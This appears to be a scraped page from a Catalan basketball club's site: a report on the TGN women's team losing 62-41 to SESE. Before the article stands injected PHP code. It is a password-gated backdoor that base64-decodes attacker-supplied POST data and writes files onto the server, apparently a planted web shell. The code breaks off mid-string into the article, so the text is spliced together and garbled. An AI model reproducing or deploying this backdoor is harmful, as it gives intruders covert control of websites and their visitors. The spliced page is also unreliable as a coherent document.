function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN comença l'any amb mal peu (62-41) - Tgn Bàsquet Club -

El TGN comença l’any amb mal peu (62-41)

Updated: gener 14, 2024

Partit corresponent a la tretzena i última jornada de la 1a fase de Supercopa Catalunya femenina, on el Sènior A ha visitat la pista del SESE, equip que arribava al partit amb un balanç de 7 victòries i 5 derrotes.

La primera part ha sigut un malson pel conjunt lila, que s’ha vist superat físicament per l’equip barceloní. Les locals han sortit molt endollades i amb un nivell d’intensitat molt elevat, fet que ha dificultat que les tarragonines despleguesin el seu joc ofensiu amb comoditat. Tot això sumat a la manca d’encert de les jugadores d’Israel Esteve, ha fet que la diferència en el marcador s’anés eixamplant progressivament. El resultat al descans era un dolorós 39-9.

Tot i això, el TGN no ha perdut la cara al partit i ha sortit a la pista després del descans amb més energia, aconseguint superar al SESE en els dos periodes restants. La reacció lila no ha sigut suficient per poder competir per la victòria, però les sensacions que s’emporta l’equip cap a casa han sigut una mica millors després dels últims 20 minuts. L’altra bona notícia que ens ha deixat el partit ha sigut la tornada de les jugadores Sheila Maeztu i Alexandra Rigal després de recuperar-se de les seves respectives lesions. Finalment, el partit ha acabat amb un resultat de 62-41.

A la propera jornada, el TGN començarà la 2a volta del campionat visitant la pista del CB Igualada el dissabte 20 de gener a les 17:30h.